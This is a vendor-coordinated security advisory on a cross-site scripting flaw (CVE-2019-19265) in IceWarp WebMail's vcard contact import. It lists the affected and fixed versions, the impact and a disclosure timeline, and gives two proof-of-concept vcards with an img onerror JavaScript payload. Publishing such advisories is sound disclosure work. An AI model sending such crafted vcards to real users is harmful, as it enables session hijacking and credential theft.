IceWarp 12.2.0 / 12.1.x Cross Site Scripting

`Advisory: IceWarp: Cross-Site Scripting in Notes for Contacts  
  
During a penetration test, RedTeam Pentesting discovered that the  
IceWarp WebMail Server is prone to user-assisted cross-site scripting  
attacks in its contact module. If IceWarp users import a manipulated  
vcard, for example from an email, attackers can run arbitrary JavaScript  
code in the users' browsers.  
  
  
Details  
=======  
  
Product: IceWarp WebMail Server  
Affected Versions: IceWarp 12.2.0, 12.1.x, probably earlier as well  
Fixed Versions: IceWarp 12.2.1.1  
Vulnerability Type: Cross-Site Scripting  
Security Risk: high  
Vendor URL: http://www.icewarp.com/  
Vendor Status: patch available  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-15  
Advisory Status: published  
CVE: CVE-2019-19265  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19265  
  
Introduction  
============  
  
"Secure professional email with own domain and revolutionary integration  
with chat. Shared calendars for perfect planning."  
(from the vendor's homepage)  
  
  
More Details  
============  
  
IceWarp allows users to import contacts in vcard format [1] from emails.  
These contacts can contain HTML notes as can be seen by exporting notes  
created by IceWarp. The following line shows such a note:  
  
------------------------------------------------------------------------  
X-ALT-NOTE;FMTTYPE=text/html:<h1>RedTeam Pentesting</h1>  
------------------------------------------------------------------------  
  
By inserting JavaScript here, a cross-site scripting vulnerability can  
be exploited if an IceWarp user imports such a manipulated contact into  
IceWarp. The property handling for the HTML formatted note "X-ALT-NOTE"  
and "FMTTYPE" is not defined in the vcard [1] standard, but is borrowed  
from the calendar file format ical [2]. Originally, the vcard standard  
uses the property "NOTE". This field can be used to exploit a cross-site  
scripting in IceWarp, too.  
  
  
Proof of Concept  
================  
  
Send an IceWarp user one of the following vcards:  
  
------------------------------------------------------------------------  
BEGIN:VCARD  
VERSION:4.0  
FN:Pentesting\, RedTeam  
N:Pentesting;RedTeam;;;  
X-ALT-NOTE;FMTTYPE=text/html:<img style="display: none\;" src="x" onerror="alert('RedTeam Pentesting')">  
EMAIL;TYPE=INTERNET,PREF:[email protected]  
END:VCARD  
------------------------------------------------------------------------  
  
or  
  
------------------------------------------------------------------------  
BEGIN:VCARD  
VERSION:4.0  
FN:Pentesting\, RedTeam  
N:Pentesting;RedTeam;;;  
NOTE:<img style="display: none\;" src="x" onerror="alert('RedTeam Pentesting')">  
EMAIL;TYPE=INTERNET,PREF:[email protected]  
END:VCARD  
------------------------------------------------------------------------  
  
  
Workaround  
==========  
  
None known.  
  
  
Fix  
===  
  
Update to IceWarp 12.2.1.1.  
  
  
Security Risk  
=============  
  
Attackers without an account on the IceWarp system can send specially  
crafted vcard [1] files to IceWarp users. If an IceWarp user imports  
that new contact into the IceWarp web application a cross-site scripting  
vulnerability can be exploited. That could, for example, be used to  
display a fake login form and get access to the user's credentials, or  
to access any data stored in IceWarp such as emails, contacts, tasks,  
files or appointments. Access to these could be abused to exploit the  
vulnerability described in rt-sa-2019-016 [3].  
This is considered to pose a high risk.  
  
  
Timeline  
========  
  
2019-11-11 Vulnerability identified  
2019-11-15 Vendor notified  
2019-11-22 Customer approved disclosure  
2019-11-25 CVE number requested  
2019-11-25 CVE number assigned  
2019-12-02 Vendor released fixed version  
2019-12-10 Customer approved disclosure  
2019-12-13 Fixed version released  
2020-01-02 Advisory released  
  
  
References  
==========  
  
[1] https://tools.ietf.org/html/rfc6350  
[2] https://tools.ietf.org/html/rfc2445  
[3] https://www.redteam-pentesting.de/advisories/rt-sa-2019-16  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.  
  
As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/  
  
  
Working at RedTeam Pentesting  
=============================  
  
RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://www.redteam-pentesting.de/jobs/  
  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
`